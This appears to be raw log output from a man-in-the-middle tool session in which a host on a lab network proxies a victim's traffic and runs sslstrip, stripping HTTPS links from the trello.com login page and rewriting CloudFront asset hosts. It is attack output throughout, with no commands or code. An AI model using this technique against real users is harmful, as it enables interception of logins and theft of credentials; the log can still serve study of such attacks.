 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.156014392 +0200 CEST m=+42.140124525 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.207902748 +0200 CEST m=+42.192012918 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/pattern-library/images/5788b03f8281e4d0d993f95d97c6265f/user-3.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.218385255 +0200 CEST m=+42.202495373 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.279756095 +0200 CEST m=+42.263866229 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/d5a49602b492398e848bdd7d14a60a23/card-surfing-lessons.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.284629465 +0200 CEST m=+42.268739583 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.394628761 +0200 CEST m=+42.378738890 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/79108507bf0ec067873590ceb530a5aa/card-tiki-drinks.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.486583556 +0200 CEST m=+42.470693673 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.59237365 +0200 CEST m=+42.576483775 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/cabe2460fbe75764c50f9adff950be00/board-back.jpg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.597363768 +0200 CEST m=+42.581473880 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.664772114 +0200 CEST m=+42.648882251 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/9685a995c7fa45b6fe6efe7de20b4a69/trellians-2x.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.674189799 +0200 CEST m=+42.658299931 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/29ebb9898948a581f7948952ba3811fd/robot.png 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35428
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.679712834 +0200 CEST m=+42.663822944 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.68446494 +0200 CEST m=+42.668575071 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.717034838 +0200 CEST m=+42.701144951 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.785587855 +0200 CEST m=+42.769697981 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.791277182 +0200 CEST m=+42.775387309 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.816631392 +0200 CEST m=+42.800741505 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:15.824186443 +0200 CEST m=+42.808296593 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.876434252 +0200 CEST m=+42.860544362 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:15] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:15.906308316 +0200 CEST m=+42.890418471 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.040602087 +0200 CEST m=+43.024712212 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:16.091294751 +0200 CEST m=+43.075404894 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small...
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-smal...
 [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.275335437 +0200 CEST m=+43.259445565 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.304693427 +0200 CEST m=+43.288803541 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:16.409366091 +0200 CEST m=+43.393476172 {12.0.0.5 GET trello.com /favicon.ico 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:16.424928416 +0200 CEST m=+43.409038551 {12.0.0.5 GET trello.com /favicon.ico 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.534720974 +0200 CEST m=+43.518831091 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.748696139 +0200 CEST m=+43.732806246 { GET trello.com /favicon.ico 108167}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:16] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:16.905737272 +0200 CEST m=+43.889847390 { GET trello.com /favicon.ico 108167}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.493042883 +0200 CEST m=+48.477152993 {12.0.0.5 GET trello.com /login 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Stripping 7 SSL links from trello.com
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:21.697684826 +0200 CEST m=+48.681794933 { GET trello.com /login 57938}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35434
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.fonts.googleapis.com with fonts.googleapis.com in request from 12.0.0.5:34866
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35438
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35440
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35442
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35444
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.799363441 +0200 CEST m=+48.783473521 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.804483398 +0200 CEST m=+48.788593514 {12.0.0.5 GET fonts.googleapis.com /css 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.810228943 +0200 CEST m=+48.794339053 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.843271757 +0200 CEST m=+48.827381871 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.847451248 +0200 CEST m=+48.831561349 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.852144188 +0200 CEST m=+48.836254284 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:21] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:21.85873505 +0200 CEST m=+48.842845181 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.01277473 +0200 CEST m=+48.996884868 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.035826544 +0200 CEST m=+49.019936670 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35434
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.173538217 +0200 CEST m=+49.157648354 { GET fonts.googleapis.com /css 2221}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.19696116 +0200 CEST m=+49.181071301 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35438
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.216725919 +0200 CEST m=+49.200836041 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35440
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:22.237006389 +0200 CEST m=+49.221116509 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35442
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.fonts.googleapis.com/css?family=Roboto
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 216.58.221.74:80 200 OK -> 12.0.0.5 (2.2 kB text/css; charset=utf-8)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.384539134 +0200 CEST m=+49.368649232 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35444
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:22.415140641 +0200 CEST m=+49.399250768 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.506851062 +0200 CEST m=+49.490961165 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:22.512529957 +0200 CEST m=+49.496640035 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
